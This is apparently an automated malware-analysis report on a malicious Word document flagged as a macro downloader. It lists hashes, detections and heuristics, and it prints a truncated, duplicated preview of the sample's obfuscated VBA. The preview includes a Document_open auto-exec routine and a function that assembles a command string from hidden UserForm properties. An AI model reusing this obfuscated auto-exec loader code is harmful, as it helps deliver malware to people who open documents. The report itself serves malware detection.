Office (OLE) malware analysis — malicious · 7482f0206dd29a88

MALICIOUS

Office (OLE)

184.4 KB Created: 2019-12-13 15:20:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 15b73dae68c2047ee5ceeba16fff3e4b SHA-1: 5dce229c86c40a7ac7e5d4800653d4d1023672ae SHA-256: 7482f0206dd29a887fff731fdd58123cdf2f135727348fff7f2b40f3e55e5a8a

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. Critical heuristics indicate a hidden-property command stager within a UserForm, designed for auto-execution via the Document_Open macro. This suggests the primary function is to download and execute a secondary payload, aligning with the ClamAV detection of a downloader.

Heuristics 7

ClamAV: Doc.Downloader.Generic-7452078-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-7452078-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10991 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10991 bytes
SHA-256: `360baa2e8371d149970bac6b48fa0b4ead77c6c70f170b7b260c86e68e558e14`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Wzlsluxcmitn" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "Frxrexkafow, 0, 0, MSForms, TextBox" Private Sub Document_open() Zfrwazjrxmqtc = Gghpxzqlx Sewtqckfpkzw = Qpbbnjuj Hqiaajuu = Geudvnjwz Select _ Case Kcpgjokkt Case 172 Jvlzujffqf _ = Hex _ (209) Tmuxfzzxjbuxn = CVar(509) Qukjaixvzrwt _ = Hex(981) Case 591 Tdbigvtoqekt = CVar(30) Haolbool _ = 899 Bnwrufjgzfqys = CDate _ (364) Case 520 Xbbdfyhgw = _ CInt(470) Dkrmcixghtzcu = Log(Etwjiizeemnh) Tgzdvczomdibl = Xzhtkunkmfq End Select Vbeuvvmli = Zmrmmqwzqzv Iikimmdgaxr = Zhykdcpe Emrkcmufaeq = Kezvvkyoaul Select _ Case Afwtiidufvu Case 221 Tgsroknt _ = Hex _ (626) Dguugyesf = CVar(883) Mojgvhiteje _ = Hex(906) Case 416 Qswigbdvmasm = CVar(886) Xvbcpimhril _ = 800 Eajwynzd = CDate _ (758) Case 307 Wmepsaoq = _ CInt(82) Tlxdgplii = Log(Xnyzvcdtzol) Eqlsuhcsqkjs = Pjcrumnzy End Select Lanbfrocgr = Esklhhjdu Hakywhmrlt = Tbmzweudv Jaixnbppqqq = Vtsuuzxn Select _ Case Rjvimzzrod Case 661 Xnkyqwdl _ = Hex _ (89) Vlecmajw = CVar(780) Hornstcq _ = Hex(839) Case 540 Bcruwekvibkqx = CVar(915) Jdknyhsxhtj _ = 354 Gxtmupbsukghp = CDate _ (909) Case 125 Esqqdyiprds = _ CInt(433) Ejaminolhx = Log(Mwotdfjtf) Dtsyyibjbyt = Jtycabwvuh End Select Lcjxqrregfpv End Sub Attribute VB_Name = "Eailhicuzjotr" Attribute VB_Base = "0{A0DE5B0E-3A42-4D31-AD8D-9BF7FB3C621F}{C31CCB3A-629D-4A31-8589-006693104201}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Ladkdwna" Function Tykabrwzuun() Qoryrtuxjxfxp = Fptsiuvgnf Qzpihlmnst = Ezmujhlyiqgl Hcuheswi = Upylchtlpanji Select _ Case Gtwczsdreeksl Case 219 Vwvoatizv _ = Hex _ (262) Vvppxuukyzzfd = CVar(464) Xuhsoiwjfqo _ = Hex(240) Case 9 Dxtbacxicogpy = CVar(398) Gvrrjkwoscn _ = 990 Lkyjauhbfyeah = CDate _ (622) Case 312 Fadphgdjzwjp = _ CInt(289) Bznozwrqxp = Log(Paxmqccajrzx) Iaznrfarezrm = Dpdnlorcmn End Select Bahavnjxvpr = Wzlsluxcmitn.Frxrexkafow Klwlwotnisrch = Cqzaqyykcsf Ifmwogot = Wmbidccsrar Sfhbmausqu = Cgunahuwc Select _ Case Ppvhzzosjkw Case 936 Gfbtmvfrjda _ = Hex _ (487) Fqswbgpqs = CVar(298) Suscbjugmdgv _ = Hex(820) Case 817 Khxwfmul = CVar(217) Xamjpdaoujar _ = 600 Pajtjeyv = CDate _ (58) Case 109 Rystnywhcxeb = _ CInt(523) Qidsawaset = Log(Dbbmwbnrr) Gavmtpeyod = Bbfupuzu End Select Zfiwvmskvqzu = Bahavnjxvpr + Eailhicuzjotr.Zrlpryhuqkt + Eailhicuzjotr.Leduriedcjuge + Eailhicuzjotr.Yzvfmnkir Jvivsalsfz = Pkossydc Zjxidxwcbzcl = Lhdzgktxbenhd Dhxjsvyyj = Wcxvzdpshku Select _ Case Tycitvvueyxse Case 1 Amjucsoq _ = Hex _ (977) Ejslktjcb = CVar(788) Tqeobtreadua _ = Hex(752) Case 520 Vaabcfhccold = CVar(315) Enpcnigwefbz _ = 983 Yckiftpsjb = CDate _ (532) ... (truncated)

SHA-256: 360baa2e8371d149970bac6b48fa0b4ead77c6c70f170b7b260c86e68e558e14

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Wzlsluxcmitn"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Frxrexkafow, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Zfrwazjrxmqtc = Gghpxzqlx
Sewtqckfpkzw = Qpbbnjuj
Hqiaajuu = Geudvnjwz
Select _
 Case Kcpgjokkt
      Case 172
         Jvlzujffqf _
         = Hex _
         (209)
         Tmuxfzzxjbuxn = CVar(509)
         Qukjaixvzrwt _
         = Hex(981)
      Case 591
         Tdbigvtoqekt = CVar(30)
         Haolbool _
         = 899
         Bnwrufjgzfqys = CDate _
         (364)
      Case 520
         Xbbdfyhgw = _
         CInt(470)
         Dkrmcixghtzcu = Log(Etwjiizeemnh)
         Tgzdvczomdibl = Xzhtkunkmfq
End Select
   Vbeuvvmli = Zmrmmqwzqzv
Iikimmdgaxr = Zhykdcpe
Emrkcmufaeq = Kezvvkyoaul
Select _
 Case Afwtiidufvu
      Case 221
         Tgsroknt _
         = Hex _
         (626)
         Dguugyesf = CVar(883)
         Mojgvhiteje _
         = Hex(906)
      Case 416
         Qswigbdvmasm = CVar(886)
         Xvbcpimhril _
         = 800
         Eajwynzd = CDate _
         (758)
      Case 307
         Wmepsaoq = _
         CInt(82)
         Tlxdgplii = Log(Xnyzvcdtzol)
         Eqlsuhcsqkjs = Pjcrumnzy
End Select
   Lanbfrocgr = Esklhhjdu
Hakywhmrlt = Tbmzweudv
Jaixnbppqqq = Vtsuuzxn
Select _
 Case Rjvimzzrod
      Case 661
         Xnkyqwdl _
         = Hex _
         (89)
         Vlecmajw = CVar(780)
         Hornstcq _
         = Hex(839)
      Case 540
         Bcruwekvibkqx = CVar(915)
         Jdknyhsxhtj _
         = 354
         Gxtmupbsukghp = CDate _
         (909)
      Case 125
         Esqqdyiprds = _
         CInt(433)
         Ejaminolhx = Log(Mwotdfjtf)
         Dtsyyibjbyt = Jtycabwvuh
End Select
Lcjxqrregfpv
End Sub


Attribute VB_Name = "Eailhicuzjotr"
Attribute VB_Base = "0{A0DE5B0E-3A42-4D31-AD8D-9BF7FB3C621F}{C31CCB3A-629D-4A31-8589-006693104201}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Ladkdwna"
Function Tykabrwzuun()
   Qoryrtuxjxfxp = Fptsiuvgnf
Qzpihlmnst = Ezmujhlyiqgl
Hcuheswi = Upylchtlpanji
Select _
 Case Gtwczsdreeksl
      Case 219
         Vwvoatizv _
         = Hex _
         (262)
         Vvppxuukyzzfd = CVar(464)
         Xuhsoiwjfqo _
         = Hex(240)
      Case 9
         Dxtbacxicogpy = CVar(398)
         Gvrrjkwoscn _
         = 990
         Lkyjauhbfyeah = CDate _
         (622)
      Case 312
         Fadphgdjzwjp = _
         CInt(289)
         Bznozwrqxp = Log(Paxmqccajrzx)
         Iaznrfarezrm = Dpdnlorcmn
End Select
Bahavnjxvpr = Wzlsluxcmitn.Frxrexkafow
   Klwlwotnisrch = Cqzaqyykcsf
Ifmwogot = Wmbidccsrar
Sfhbmausqu = Cgunahuwc
Select _
 Case Ppvhzzosjkw
      Case 936
         Gfbtmvfrjda _
         = Hex _
         (487)
         Fqswbgpqs = CVar(298)
         Suscbjugmdgv _
         = Hex(820)
      Case 817
         Khxwfmul = CVar(217)
         Xamjpdaoujar _
         = 600
         Pajtjeyv = CDate _
         (58)
      Case 109
         Rystnywhcxeb = _
         CInt(523)
         Qidsawaset = Log(Dbbmwbnrr)
         Gavmtpeyod = Bbfupuzu
End Select
Zfiwvmskvqzu = Bahavnjxvpr + Eailhicuzjotr.Zrlpryhuqkt + Eailhicuzjotr.Leduriedcjuge + Eailhicuzjotr.Yzvfmnkir
   Jvivsalsfz = Pkossydc
Zjxidxwcbzcl = Lhdzgktxbenhd
Dhxjsvyyj = Wcxvzdpshku
Select _
 Case Tycitvvueyxse
      Case 1
         Amjucsoq _
         = Hex _
         (977)
         Ejslktjcb = CVar(788)
         Tqeobtreadua _
         = Hex(752)
      Case 520
         Vaabcfhccold = CVar(315)
         Enpcnigwefbz _
         = 983
         Yckiftpsjb = CDate _
         (532)
  
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.